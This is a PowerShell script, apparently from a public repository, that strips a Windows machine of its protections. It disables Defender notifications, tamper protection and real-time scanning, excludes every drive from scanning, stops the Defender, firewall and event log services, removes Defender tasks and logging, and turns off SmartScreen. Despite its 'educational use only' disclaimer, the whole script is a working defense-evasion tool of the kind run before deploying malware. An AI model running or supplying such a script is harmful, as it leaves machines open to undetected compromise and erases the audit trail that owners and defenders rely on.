# --- Author: zetod1ce (github.com/ztd38f) --- #
# --- DISCLAIMER: Provided as-is, without warranties. For educational and testing use only in controlled environments. Use at your own risk. --- #


# 0. Disabling all Defender and system notifications
Write-Host "0. Disabling all Defender and system notifications" -f Yellow
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
("EnableNotifications","EnableToastApplicationNotification","NOC_GLOBAL_SETTING_TOASTS_ENABLED") |% {reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "$_" /t REG_DWORD /d 0 /f}
("DisableNotifications","DisableEnhancedNotifications","DisableMonitoring","DisableAlerts","DisableNotificationsUI","DisableNotificationCenter") |% {reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "$_" /t REG_DWORD /d 1 /f}

# 1. Blinding Defender (System-wide Exclusion)
Write-Host "1. Blinding Defender (System-wide Exclusion)" -f Yellow
(ni "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -force)
((gdr -psp FileSystem).Root |% {New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -n $_ -pr string -v "" -force; Add-MpPreference -ExclusionPath $_ -force})

# 2. Disabling TamperProtection
Write-Host "2. Disabling TamperProtection" -f Yellow
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 3. Disabling Controlled Folder Access
Write-Host "3. Disabling Controlled Folder Access" -f Yellow
Set-MpPreference -EnableControlledFolderAccess Disabled

# 4. Defender and Component Disable Policies
Write-Host "4. Defender and Component Disable Policies" -f Yellow
function Disable-DefenderPolicies {
    ("AllowFastServiceStartup","ServiceKeepAlive") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 0 /f}
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
    ("DisableAntiSpyware","DisableAntiVirus","DisableSpecialRunningModes") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 1 /f}
    ("DisableBehaviorMonitoring","DisableIOAVProtection","DisableOnAccessProtection","DisableRealtimeMonitoring","DisableRoutinelyTakingAction","DisableScanOnRealtimeEnable") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "$_" /t REG_DWORD /d 1 /f}
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
}
# Disable-DefenderPolicies

# 5. Disabling SgrmBroker and SecurityHealthService
Write-Host "5. Disabling SgrmBroker and SecurityHealthService" -f Yellow
("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f}

# 6. Disabling WMI Autologger for Defender
Write-Host "6. Disabling WMI Autologger for Defender" -f Yellow
("DefenderApiLogger","DefenderAuditLogger") |% {reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\$_" /v "Start" /t REG_DWORD /d 0 /f}

# 7. Disabling Defender Scheduled Tasks
Write-Host "7. Disabling Defender Scheduled Tasks" -f Yellow
schtasks /Change /tn "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /disable
("Windows Defender Cache Maintenance","Windows Defender Cleanup","Windows Defender Scheduled Scan","Windows Defender Verification") |% {schtasks /change /tn "Microsoft\Windows\Windows Defender\$_" /disable}

# 8. Disabling core protection services
Write-Host "8. Disabling core protection services" -f Yellow
("Sense","webthreatdefsvc","webthreatdefusersvc","WdNisSvc","WdNisDrv","MDCoreSvc","SgrmBroker","SecurityHealthService","wscsvc","WinDefend","WdFilter","WdBoot","MpsSvc","mpssvc","BFE","Wecsvc","EventLog") |% {spsv $_ -force -ea 0; Set-Service $_ -st Disabled -ea 0; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "AutorunsDisabled" /t REG_DWORD /d 3 /f}

# 9. Removing SecurityHealth autoruns
Write-Host "9. Removing SecurityHealth autoruns" -f Yellow
("Explorer\StartupApproved\Run","Run") |% {reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\$_" /v "SecurityHealth" /f}

# 10. Removing EPP context menus
Write-Host "10. Removing EPP context menus" -f Yellow
("*","Directory","Drive") |% {reg delete "HKCR\$_\shellex\ContextMenuHandlers\EPP" /f}

# 11. Disabling SmartScreen and related features
Write-Host "11. Disabling SmartScreen and related features" -f Yellow
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
("SmartScreenEnabled","SmartScreenPuaEnabled") |% {reg add "HKCU\Software\Microsoft\Edge\$_" /ve /t REG_DWORD /d 0 /f}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
("SvcEnabled","ServiceStart","ServiceState") |% {reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI" /v "$_" /t REG_DWORD /d 0 /f}

Write-Host "Done." -f Green